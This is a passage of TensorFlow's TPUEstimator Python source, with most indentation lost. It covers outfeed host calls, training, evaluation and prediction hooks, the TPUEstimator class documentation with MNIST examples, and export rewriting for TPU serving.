for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
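  # Illustrative (hedged) flow: after `record({'host_call': (fn, [t1, t2])})`,
  # `create_enqueue_op()` outfeeds [t1, t2] from each replica, and
  # `create_tpu_hostcall()` dequeues them per replica, concatenates each tensor
  # along the batch dimension, and calls `fn(t1_concat, t2_concat)` on the CPU
  # host.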
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
    across all shards. The concatenated tensors are passed to the host_fn, which
    is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return []
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
    # constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
tpu_device_placement_fn = self._ctx.tpu_device_placement_function
for i in xrange(self._ctx.num_replicas):
with ops.device(tpu_device_placement_fn(i)):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])]
pos += len(self._tensors[name])
    # It is assumed evaluation always happens on a single-host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(core_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
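# Worked example (hypothetical shapes): with 8 replicas each outfeeding logits
# of shape [16, 10], create_tpu_hostcall() above concatenates the dequeued
# tensors along axis 0 into a single [128, 10] tensor before invoking the
# recorded host_fn / metric_fn on the CPU host.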
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
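  # Worked example (hypothetical numbers): with batch_size=1024 and 100 steps
  # completed in 2.0 seconds, global_step/sec is 50 and examples/sec is
  # 1024 * 50 = 51200.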
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
    `input_fn` gets per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return
`EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case
the following discussion on TPU evaluation does not apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
  prediction will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker).
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
      'accuracy': tf.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
  It is not designed for latency-critical systems. In addition, due to some
  usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
  data from the generator so that TPUEstimator can shut down the TPU system
  properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
  for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
  `export_savedmodel` exports two metagraphs, one with `tag_constants.SERVING`,
and another with `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select metagraph to load.
  Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If
not, please call `session.run(tpu.initialize_system())`.
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
Current limitations:
--------------------
1. Outside compilation does not work yet (b/79991729).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
warm_start_from=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator`. For training, the
returned `EstimatorSpec` cannot have hooks as it is not supported in
`TPUEstimator`.
      model_dir: Directory to save model parameters, graph, etc. This can
        also be used to load checkpoints from the directory into an estimator
        to continue training a previously saved model. If `None`, the model_dir
        in `config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`.
Must be divisible by total number of replicas.
eval_batch_size: An int representing evaluation batch size.
Must be divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size.
Must be divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU besides the one on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings`
object to fully configure warm-starting. If the string
filepath is provided instead of a `WarmStartSettings`,
then all variables are warm-started, and it is assumed
that vocabularies and Tensor names are unchanged.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.computation_shape):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as the parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to prevent TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Pass non-None params, as the wrapped model_fn expects it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size,
eval_batch_size, predict_batch_size,
use_tpu,
eval_on_tpu)
self._export_to_tpu = export_to_tpu
self._is_input_fn_invoked = None
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None):
if mode != model_fn_lib.ModeKeys.PREDICT:
raise NotImplementedError(
'TPUEstimator only handles mode PREDICT for export_savedmodel(); '
'got {}.'.format(mode))
super(TPUEstimator, self)._add_meta_graph_for_mode(builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables,
mode=mode)
if self._export_to_tpu:
input_receiver_fn_map = {_REWRITE_FOR_INFERENCE_MODE:
input_receiver_fn_map[mode]}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
(super(TPUEstimator, self).
_add_meta_graph_for_mode(builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=False,
mode=mode,
export_tags=export_tags))
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode))
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
mode = model_fn_lib.ModeKeys.PREDICT
estimator_spec = self._call_model_fn(features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
tensors_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs)
)
tensors = nest.flatten(tensors_dict)
tpu_tensors = [t for t in tensors if _is_tpu_tensor(t)]
# We cannot return anything other than `tpu_tensors` here so we capture
# the rest for later use.
capture.capture((estimator_spec, tensors_dict, tensors))
return tpu_tensors
tpu_tensors_on_cpu = tpu.rewrite_for_inference(computation)
estimator_spec, tensors_dict, tensors = capture.get()
# Reconstruct `tensors`, but with `tpu_tensors` replaced with
# `tpu_tensors_on_cpu`.
new_tensors = [
tpu_tensors_on_cpu.pop(0) if _is_tpu_tensor(t) else t
for t in tensors
]
# Reconstruct `tensors_dict`.
new_tensors_dict = nest.pack_sequence_as(tensors_dict, new_tensors)
# Reconstruct `export_outputs`.
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_tensors_dict)
)
return estimator_spec._replace(export_outputs=new_export_outputs)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
Either features or (features, labels) where features and labels are:
features - `Tensor` or dictionary of string feature name to `Tensor`.
labels - `Tensor` or dictionary of `Tensor` with labels.
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Set the batch size in params first. This helps users keep the same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'],
_BATCH_SIZE_KEY, batch_size_for_input_fn)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has a stronger check, and the parent class's check generates a confusing
warning message.
Args:
result: `features` returned by input_fn.
"""
pass
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
if mode != model_fn_lib.ModeKeys.PREDICT:
is_export_mode = False
else:
# For export_savedmodel, input_fn is never passed to Estimator. So, when
# mode == PREDICT, checking the self._is_input_fn_invoked bit tells us
# whether this is the .predict API rather than the export_savedmodel API.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
return model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'shutdown_worker')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(timeout_ms=60*1000),
]
elif shutdown_mode == 'shutdown_computation':
finalizer_hooks = [
session_support.RestartComputation(timeout_ms=60*1000),
]
else:
raise ValueError('Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' %
shutdown_mode)
shutdown_hooks.append(session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks
))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
logging_hook_frequency = ( # Divide and round up
(self._log_every_n_steps +
self._config.tpu_config.iterations_per_loop - 1) //
self._config.tpu_config.iterations_per_loop)
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
InstallSignalHandlerHook(),
training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=logging_hook_frequency)
])
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
output_dir=self.model_dir,
every_n_steps=self._log_every_n_steps)
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
hooks.append(examples_hook)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops()
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(total_loss,
math_ops.cast(
iterations_per_loop_var,
dtype=total_loss.dtype))
# Creates a dummy metric update_op for all metrics. Estimator expects
# every metric in eval_metric_ops to have an update_op and calls them one
# by one. The real metric update_ops are invoked in a separate thread.
# So, here we give Estimator the dummy op for all metrics.
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops()
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
for k, v in host_call_ret['eval_metrics'].items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops()
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yields the element (via a generator) to the call site. So,
# the outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoids the issue where we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions, message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = []  # Empty; we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops,
host_ops),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _is_tpu_tensor(tensor):
if not isinstance(tensor, ops.Tensor):
return False
try:
tensor.op.get_attr(tpu._OUTSIDE_COMPILATION_ATTR) # pylint: disable=protected-access
except ValueError:
return True
else:
return False
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output.outputs.values()
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
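# For example (sketch, not part of the original code):
#   _export_output_to_tensors(PredictOutput({'logits': t})) returns the
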